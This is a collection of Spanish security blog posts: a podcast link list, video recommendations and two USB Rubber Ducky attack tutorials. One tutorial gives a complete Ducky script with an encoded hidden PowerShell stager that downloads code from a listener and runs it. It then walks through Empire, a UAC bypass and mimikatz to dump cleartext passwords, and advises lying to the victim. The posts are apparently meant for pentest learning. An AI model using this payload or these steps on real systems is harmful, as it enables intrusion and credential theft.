En este nuevo podcast hablamos sobre las actualizaciones de seguridad de los navegadores Firefox, Chrome, el parche de seguridad contra Dirty para dispositivos Android, el malware en Android Gooligan, Avast y Eset contra ransomware, ademas del permiso que tiene el FBI para hackearnos, ya entran a tu puerta y hacen lo que deseen y más en este nuevo podcast de Dame una Shell.

Como siempre los enlaces y las incrustaciones para el que lo quiera escuchar desde el blog.





Los enlaces y referencias mencionadas en el Podcast

Foxit actualización.
https://www.foxitsoftware.com/support/security-bulletins.php#content-2016

Mozilla Foundation Security Advisory 2016-92 https://www.mozilla.org/en-US/security/advisories/mfsa2016-92

Firefox código exploit disponible
 https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html
Lenovo System Interface Foundation Privilege Escalation https://support.lenovo.com/es/es/solutions/LEN_10150

Android Security Bulletin—December 2016 https://source.android.com/security/bulletin/2016-12-01.html

Stable Channel Update Google Chrome
https://googlechromereleases.blogspot.com.es/2016/12/stable-channel-update-for-desktop.html

 More Than 1 Million Google Accounts Breached by Gooligan
 http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/

Herramienta de Eset contra Ransomware Crysis
https://www.eset.com/int/about/newsroom/research/eset-releases-free-decryptor-for-crysis-ransomware/

Obtener datos de Tarjetas de Credito en 6 Segundos
http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-BDB3-73C22D6E1FDB.pdf
 https://www.youtube.com/watch?v=uwvjZGKwKvY

TU QUE OPINAS? : Gracias por leerme y escucharme, no dudes en comentar y dar tu punto de vista lo mencionado en este podcast es una apreciación personal, lo que se desea es compartir información de una manera mas amena y permitir nutrirnos en momentos muertos.

Regards,
Snifer
Leer Mas
Esta segunda entrada de Rubber Ducky de esta semana veremos un ataque por mencionarlo asi en el cual se hace uso de Metasploit y PowerShell por medio de una automatización realizada en Ruby este script se encuentra disponible en Github realizado por b00stfr3ak con el nombre de Powershell Reverse Rubber Ducky.



En este caso no es un bypass completo de las medidas de seguridad del objetivo, y lo menciono debido a que el dia de ayer en la entrada Ataque y Escalamiento de privilegios (mimikatz) con Rubber Ducky & Empire Framework fue posible realizar un bypass al antivirus y en ningun momento alerto logrando realizar el escalamiento de privilegios sin inconvenientes.

Lo que necesitamos para esta prueba es el Script que se encuentra en el siguiente repositorio.


Como siempre tienen la opción de bajar desde la web en formato compreso y luego hacer todo lo que conllevas o en su defecto con git.

snifer@root:$ git clone https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky.git 

Una vez se descarga el repositorio contamos con el script reverse_powershell_ducky.rb que esta sobre-entendido que se debe ejecutar con Ruby.

snifer@root:$ ruby reverse_powershell_duck.rb  


Si ven en la captura el script nos solicita en cada paso algunos datos los cuales son:

Servidor: En este caso el equipo donde estaremos a la escucha de la shell reversa.
Puerto: El puerto que estaremos a la escucha valga la redundancia.
Generación de BIN.

Y por ultimo y no menos importante el mismo script nos pregunta si configura el listener en el mismo procede a llamar a metasploit y configurarlo el mismo se ve a continuación aqui lo bueno es que manda el mismo en background con el nos permite realizar otro tipo de tareas.


Lo siguiente y no debemos olvidarnos es cargar el bin generado en nuestra Rubber Ducky. (Así es ando reutilizando la imagen de la entrada de ayer.)

Despues que el script realiza su ejecución nos da el resultado que se ve en la siguiente captura.


Para ver las sesiones activas se realiza por medio del comando sessions -l.



Y para interactura y acceder al mismo es con el comando sessions -i (ID  de la sesion).




Como veran ya es posible interactura con el mismo,  ya de aqui depende de como realizar un escalamiento con Metasploit, Pass the Hash de ser necesario. Despues de  un momento el Antivirus salto en la pc como se ve a continuación indicando que se tiene una Amenaza detectada en Memoria.


En una próxima entrada lo que veremos es como realizar el bypass al antivirus, por medio de diferentes tecnicas y pruebas cuando se ejecute nuestro payload espero sea de tu agrado y cualquier duda no dudes en realizarlo en los comentarios.


Regards,
Snifer
Leer Mas
Como se dieron cuenta con el titulo del post hoy abordamos en el blog, un escalamiento de privilegios con mimikatz a travez de Empire Framework, haciendo uso del Pato (Rubber Ducky) como herramienta de ataque por decirlo así, tal cual como hable el dia de ayer en la entrada de Mejorar tu empleabilidad y/o liderar tu propia empresa esta es la entrada que tenia pensado armar.


Herramientas necesarias

Lo que necesitaremos para realizar este ataque por decirlo asi son las siguientes:

               - Un Rubber Ducky
               - Empire Framework
               - Ingenieria Social ?
               - Equipo Windows (Objetivo)

Un punto a tomar en cuenta es que no necesitamos deshabilitar el antivirus ni realizar ningun Bypass en este sentido debido a las bondades que tiene el Rubber Ducky asi que en este caso salte un robotcito el cual actualizado no me dijo oye!!! ni por el firewall ni nada ya verán las razones que se consideraron.

Configuración de Empire

Lo primero que hacemos es ejecutar Empire Framework, la instalación del mismo vimos en una entrada anterior que es Power Shell Empire, como ven en la imagen anterior nos muestra 0 agents y listeners activos. Procedemos  a ejecutar el comando listeners seguido de HELP con el fin de visualizar la ayuda que nos da la herramienta para continuar.


Lo que haremos es ver por medio del comando info que nos muestra las opciones del mismo, en el vemos que tenemos el Nombre (Name) y el Puerto (Port) por lo tanto como Empire tiene algo o bastante parecido con Metasploit para configurar procedemos usar set Port y set Name como vemos a continuación.



En este caso el nombre es RubberDucky y por una simple lógica e idea de posible bypass al firewall que tenga el equipo a atacar se configura al puerto 443, una vez realizado ello vamos para atras con el comando back y veremos que tenemos ya un listener activo.


Configuración y Generación de Rubber Ducky

Ahora lo que tenemos que hacer es configurar el agent por ello  ejecutamos en la terminal de Empire agents e introducimos usestager y al realizar un tab (tabulación) tenemos el listado de  los stagers a usar como veran tenemos para generar un fichero bat, vbs, macro, para teensy y ducky como otros el que nos interesa es el ducky por lo tanto damos usestager ducky.



Notaran que al ejecutar el comando info en el framework nos da las opciones como lo tenemos en Metasploit con show options, si notan tenemos marcado el valor OutFile ademas de ello el Listener que debemos de especificar el creado con anterioridad en esta prueba es RubberDucky.

Para terminar este proceso ejecutamos el comando generate el cual nos generara el fichero en la ruta configurada en OutFile, el contenido generado respectivo lo muestro a continuación

DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc WwBTAHkAUwBUAEUAbQAuAE4AZQB0AC4AUwBlAHIAVgBJAEMARQBQAE8ASQBOAHQATQBBAE4AQQBnAGUAUgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABDAE8ATgB0AEkATgB1AGUAIAA9ACAAMAA7ACQAdwBDAD0ATgBFAHcALQBPAGIASgBFAEMAdAAgAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBXAGUAYgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBBAEQAZQBSAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBPAFgAeQAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBSAEUAcQBVAEUAcwBUAF0AOgA6AEQAZQBGAGEAVQBsAFQAVwBlAEIAUAByAE8AeAB5ADsAJABXAGMALgBQAFIATwBYAFkALgBDAFIAZQBkAEUATgB0AGkAQQBsAHMAIAA9ACAAWwBTAHkAUwB0AGUATQAuAE4ARQBUAC4AQwByAGUARABFAE4AVABpAEEAbABDAEEAQwBIAEUAXQA6ADoARABlAGYAYQBVAGwAdABOAEUAdAB3AE8AcgBLAEMAcgBlAEQARQBuAFQASQBhAGwAUwA7ACQASwA9ACcAMgBkADQAMwBhADQANABmADUANQAyAGQAOABlADUAYQA3ADIAYQBmAGUAMwA4ADQAZQBhADIANQBmAGMAZAA3ACcAOwAkAEkAPQAwADsAWwBjAGgAQQByAFsAXQBdACQAYgA9ACgAWwBDAEgAQQByAFsAXQBdACgAJABXAEMALgBEAE8AVwBuAGwATwBhAEQAUwB0AHIAaQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADAALgA4ADoANAA0ADMALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAVABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBKAE8AaQBOACcAJwApAA== 
ENTER

Una breve explicación?


  • Esperamos 3 segundos antes de que se ejecute el payload.
  • Llama al prompt de ejecutar.
  • Espera 1 segundo.
  • Escribe cmd para llamarlo.
  • Ejecuta la llamada.
  • Espera 2 segundos
  • Comienza a escribir todo el dato que se tiene en la variable String.
  • Ejecuta lo escrito.

Generación y Ejecucion de Payload en la Rubber Ducky


Lo primero que corresponde hacer es generar el bin pasar nuestro script para ello tenemos en esta entrada de Creando nuestro primer Payload, en el mismo tenemos las diferentes opciones para generar nuestro bin que es interpretado por la Rubber Ducky, asi que una vez que lo tenemos listo nos toca pasar el fichero a la memoria y listo para ser enchufado en nuestro objetivo.


Una vez conectamos el Payload comienza a ejecutarse y como era de suponerse esto se visualiza, vale aclarar que se debe de reducir el tiempo de esperar modificar o simplemente con algo de Ingenieria Social charlar a la persona que estamos usando para realizar el ataque y decirle alguna mentira blanca.



 Escalamiento de Privilegios y Obtención de Credenciales


En Empire tenemos que esperar que se ejecute y recibir la conexión respectiva, nos da que el agente a inicializado dando unos valores respectivos del agente, para validar ello procedemos a ejecutar agents y tenemos los datos del objetivo, teniendo La dirección IP, Nombre de la máquina, Usuario, el Proceso que tenemos arraigado, el delay respectivo.



interact Nombre_del_Agente

Lo primero que notamos es que si procedemos a ejecutar mimikatz nos dira que no tenemos los privilegios necesarios aqui viene al rescate EMPIRE con su módulo bypassuac que para el uso es bypassUAC y el nombre de nuestro Listner y veremos el siguiente mensaje el que esta en verde mas la generación de un nuevo Agente con un asterisco asi que este es el que tiene privilegios.


Aqui tenemos un pequeño problema, por decirlo asi el recordar cual de los dos agents que tenemos es el que tiene privilegios o no, en este caso no tenemos mucho por donde perdernos pero que sucede si tenemos mas de un agente como los diferenciamos uno del otro  ya que existe la probabilidad que ejecutemos lo que no debemos en uno u el otro para ello tenemos la opción del RENAME el cual nos permite renombrar el nombre a uno más facil personalizable y descriptivo como vemos a continuación. 


 Pero que sucede si se hubiera ejecutado  mimikatz directo en nuestro primer agent que nos brindo el pato tenemos la siguiente respuesta, que debemos contar con mas privilegios por lo tanto no era posible ejecutarlo, si como lo vieron despues de renombrar recorde que no saque la captura ni la prueba del delito.


Por lo tanto una vez que tenemos ya renombrado en este caso con el nombre de Privilegio lanzamos interact Privilegio y ejecutamos nuevamente mimikatz tras esperar un momento por el delay previamente configurado. 

Veran que nos da los resultados esperando tenemos la contraseñas en texto claro en este caso de un unico usuario, ya viendo para un equipo con mas usuarios o con uno con privilegios administrativos la grande que podemos armar, y para terminar un detalle mas de Empire que con el comando creds nos devuelve una bonita tabla con los resultados de mimikatz.

Con esto damos por terminado la entrada de hoy espero les agrade y no duden en comentar, en proximas entradas explotaremos mas a Empire 

NOTA : Tienes un pato Rubber Ducky? que tal te fue? tu antivirus lo detecto lograste escalar privilegios tienes alguna duda punto a mejorar no dudes en realizarlo.

Regards,
Snifer
Leer Mas
Hoy no pensaba compartir este video, mas bien esta semana compartire entradas referentes a la pequeña Rubber Ducky que por cierto tenemos algunas entradas en el blog, que son Creando mi primer Payload
Conociendo a la USB Rubber y Crea tu propia Usb Rubber Ducky con una USB normal en los cuales vemos como crear un payload, lo que trae  la rubber ducky y como crear nuestra propia rubber, pero creo que esta entrada que tenia pensado para hoy viene mañana ya que por la tarde ya al terminar el trabajo me puse a revisar los videos del Cybercamp de este año,  y me agarro el nombre del siguiente video.




Si el de Mundo Hacker Antonio Ramos, en el cual nos da un vistazo y su vision de como estar en una empresa como liderar una y seguir adelante con todo lo que tenemos sea poco o mucho.



Una charla que me agrado y me encanto asi tambien como la conferencia de Enrique Serrano especificamente de lo importante que es la apariencia, para que los demás nos vean aun más en el mundo laboral, saber vendernos por fuera por todo lo que sabemos el mismo se ve en el minuto 8:18 hasta el 09:45 mas o menos espero que esta semana sea productiva para todos ustedes  y si esta semana estaremos jugando con el Pato, espero conozcan mas de el como yo ando haciendolo.

¿Mas vale ser cabeza de ratón que cola de León?

Regards,
Snifer
Leer Mas
Dia sábado y volvemos con las recomendaciones audiovisuales siendo estas ponencias y retornamos con ello con este video de la mano de Joxean Koret en el cual presento alla por el 2013 la herramienta FUGUE para un análisis estático de vulnerabilidades.


Para aquel que no sepa quien es Joxean, es el creador de Diaphora, Nightmare la primera siendo un differ de binarios y la segunda una herramienta de fuzzing en ambos casos dejo los enlaces respectivos.




Me olvida mencionar que es el co-autor del libro
Image result for The Antivirus Hacker's Handbook



Gracias a SoftDat que compartio el video.
Regards,
Snifer
Leer Mas